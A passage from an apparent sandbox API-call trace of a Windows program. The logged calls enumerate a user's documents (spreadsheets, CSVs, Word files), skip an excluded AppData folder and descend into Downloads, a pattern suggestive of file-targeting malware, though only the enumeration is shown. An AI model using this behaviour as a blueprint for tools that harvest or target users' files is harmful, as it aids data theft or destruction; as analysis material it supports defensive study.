cFileName="YCwVOFdIAc7At.xlsx", cAlternateFileName="YCWVOF~1.XLS")) returned 1 [0074.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b378 [0074.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0074.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c30 [0074.151] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa07c2050, ftCreationTime.dwHighDateTime=0x1d5e47a, ftLastAccessTime.dwLowDateTime=0x19f5cf50, ftLastAccessTime.dwHighDateTime=0x1d5e2b7, ftLastWriteTime.dwLowDateTime=0x19f5cf50, ftLastWriteTime.dwHighDateTime=0x1d5e2b7, nFileSizeHigh=0x0, nFileSizeLow=0x5acd, dwReserved0=0x10, dwReserved1=0x657690, cFileName="zw2wea8 QxA.csv", cAlternateFileName="ZW2WEA~1.CSV")) returned 1 [0074.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b318 [0074.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0074.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c30 [0074.152] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6343b140, ftCreationTime.dwHighDateTime=0x1d5966d, ftLastAccessTime.dwLowDateTime=0x1a09100, ftLastAccessTime.dwHighDateTime=0x1d59993, ftLastWriteTime.dwLowDateTime=0x1a09100, ftLastWriteTime.dwHighDateTime=0x1d59993, nFileSizeHigh=0x0, nFileSizeLow=0x143af, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="ZZwMa.docx", cAlternateFileName="ZZWMA~1.DOC")) returned 1 [0074.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b378 [0074.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0074.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c30 [0074.152] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x1080079, ftCreationTime.dwLowDateTime=0xc2e16, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x11a007a, nFileSizeHigh=0xc2e16, nFileSizeLow=0x76b2a0, dwReserved0=0x10, dwReserved1=0x657690, cFileName="ZZ\x08", cAlternateFileName="?haဓ\x03\x10")) returned 0 [0074.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b318 [0074.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2b8 [0074.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c30 [0074.152] FindClose (in: hFindFile=0x6b8a38 | out: hFindFile=0x6b8a38) returned 1 [0074.152] FindNextFileW (in: hFindFile=0x6b8978, lpFindFileData=0x61e580 | out: lpFindFileData=0x61e580*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0074.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a9d0 [0074.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dba8 [0074.152] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b00 [0074.152] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0074.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Downloads", cchCount1=9, lpString2="AppData", cchCount2=7) returned 3 [0074.152] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a7c0 | out: hHeap=0x650000) returned 1 [0074.152] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a8e0 | out: hHeap=0x650000) returned 1 [0074.152] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0074.152] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b10 | out: hHeap=0x650000) returned 1 [0074.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b80 | out: hHeap=0x650000) returned 1 [0074.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8a38 | out: hHeap=0x650000) returned 1 [0074.153] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b80 [0074.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b80 | out: hHeap=0x650000) returned 1 [0074.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b810 | out: hHeap=0x650000) returned 1 [0074.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd10 | out: hHeap=0x650000) returned 1 [0074.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b70 | out: hHeap=0x650000) returned 1 [0074.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dce8 | out: hHeap=0x650000) returned 1 [0074.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa60 | out: hHeap=0x650000) returned 1 [0074.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ab0 | out: hHeap=0x650000) returned 1 [0074.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc48 | out: hHeap=0x650000) returned 1 [0074.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9b8 | out: hHeap=0x650000) returned 1 [0074.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9a0 | out: hHeap=0x650000) returned 1 [0074.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b30 | out: hHeap=0x650000) returned 1 [0074.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd38 | out: hHeap=0x650000) returned 1 [0074.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa00 | out: hHeap=0x650000) returned 1 [0074.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a70 | out: hHeap=0x650000) returned 1 [0074.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a30 | out: hHeap=0x650000) returned 1 [0074.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dba8 | out: hHeap=0x650000) returned 1 [0074.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9d0 | out: hHeap=0x650000) returned 1 [0074.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9e8 | out: hHeap=0x650000) returned 1 [0074.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbf8 | out: hHeap=0x650000) returned 1 [0074.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a80 | out: hHeap=0x650000) returned 1 [0074.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690aa0 | out: hHeap=0x650000) returned 1 [0074.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0074.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a90 | out: hHeap=0x650000) returned 1 [0074.153] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b00 | out: hHeap=0x650000) returned 1 [0074.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b00 [0074.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0074.154] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0074.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b00 | out: hHeap=0x650000) returned 1 [0074.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbf8 [0074.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690b00 [0074.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dba8 [0074.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a9e8 [0074.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690a90 [0074.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a9d0 [0074.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690aa0 [0074.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa00 [0074.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690a80 [0074.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a9a0 [0074.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690a30 [0074.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x50) returned 0x6d3480 [0074.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9a0 | out: hHeap=0x650000) returned 1 [0074.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a9a0 [0074.154] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xb0) returned 0x6b9970 [0074.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d3480 | out: hHeap=0x650000) returned 1 [0074.154] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a9a0 | out: hHeap=0x650000) returned 1 [0074.155] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.155] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690a80 | out: hHeap=0x650000) returned 1 [0074.155] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690aa0 | out: hHeap=0x650000) returned 1 [0074.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690aa0 [0074.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a9a0 [0074.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690a80 [0074.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a9b8 [0074.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690a70 [0074.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa60 [0074.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690b30 [0074.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a8e0 [0074.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ab0 [0074.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b70 [0074.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.155] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.155] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b70 | out: hHeap=0x650000) returned 1 [0074.155] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ab0 | out: hHeap=0x650000) returned 1 [0074.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76a7c0 [0074.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd38 [0074.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b180 [0074.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ab0 [0074.155] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b180 | out: hHeap=0x650000) returned 1 [0074.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc48 [0074.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dce8 [0074.155] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b180 [0074.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b70 [0074.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1f8 [0074.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b288 [0074.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd10 [0074.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2a0 [0074.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b80 [0074.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd88 [0074.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a778 [0074.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b10 [0074.156] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a778 | out: hHeap=0x650000) returned 1 [0074.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddb0 [0074.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc20 [0074.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a778 [0074.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690a50 [0074.156] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a778 | out: hHeap=0x650000) returned 1 [0074.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc70 [0074.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd60 [0074.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a778 [0074.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b90 [0074.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a6d0 [0074.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b810 [0074.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc98 [0074.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a958 [0074.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ae0 [0074.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a988 [0074.156] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b210 [0074.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dcc0 [0074.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a868 [0074.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690af0 [0074.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a8f8 [0074.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2b8 [0074.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b20 [0074.157] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2b8 | out: hHeap=0x650000) returned 1 [0074.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0074.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2b8 [0074.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bb0 [0074.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2e8 [0074.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c30 [0074.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b318 [0074.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b60 [0074.157] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x60) returned 0x75b208 [0074.157] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b318 | out: hHeap=0x650000) returned 1 [0074.157] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.157] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c30 | out: hHeap=0x650000) returned 1 [0074.157] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bb0 | out: hHeap=0x650000) returned 1 [0074.157] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8a38 [0074.158] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.158] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e340 | out: lpFindFileData=0x61e340*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0074.158] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0074.158] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b318 [0074.158] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bb0 [0074.158] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b318 | out: hHeap=0x650000) returned 1 [0074.158] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0074.158] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x75b208 | out: hHeap=0x650000) returned 1 [0074.158] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0074.158] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2e8 | out: hHeap=0x650000) returned 1 [0074.158] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2b8 | out: hHeap=0x650000) returned 1 [0074.158] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddd8 | out: hHeap=0x650000) returned 1 [0074.158] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b20 | out: hHeap=0x650000) returned 1 [0074.158] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.158] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b20 [0074.158] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b60 [0074.158] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c30 [0074.158] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.159] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c30 | out: hHeap=0x650000) returned 1 [0074.159] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.159] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0074.159] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b20 | out: hHeap=0x650000) returned 1 [0074.159] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.159] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b20 [0074.159] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b20 | out: hHeap=0x650000) returned 1 [0074.159] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8a78 [0074.159] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.159] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b20 [0074.159] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0074.159] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2b8 [0074.159] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b60 [0074.159] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0074.159] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2e8 [0074.159] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b60 [0074.159] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b318 [0074.159] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2b8 | out: hHeap=0x650000) returned 1 [0074.159] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddd8 | out: hHeap=0x650000) returned 1 [0074.159] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b20 | out: hHeap=0x650000) returned 1 [0074.159] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2e8 | out: hHeap=0x650000) returned 1 [0074.159] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.159] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b20 [0074.159] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.159] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c30 [0074.159] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.160] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c30 | out: hHeap=0x650000) returned 1 [0074.160] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b20 | out: hHeap=0x650000) returned 1 [0074.160] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.160] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b20 [0074.160] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.160] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c30 [0074.160] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.160] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c30 | out: hHeap=0x650000) returned 1 [0074.160] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b20 | out: hHeap=0x650000) returned 1 [0074.160] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8ab8 [0074.160] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.160] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b20 [0074.160] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2e8 [0074.160] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c30 [0074.160] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.160] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2b8 [0074.160] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ba0 [0074.160] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x70) returned 0x764cc0 [0074.160] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2b8 | out: hHeap=0x650000) returned 1 [0074.160] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.160] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0074.160] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2b8 [0074.160] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b378 [0074.160] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bd0 [0074.161] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.161] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0074.161] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b378 | out: hHeap=0x650000) returned 1 [0074.161] HeapFree (in: hHeap=0x650000, dwFlags=0x0, 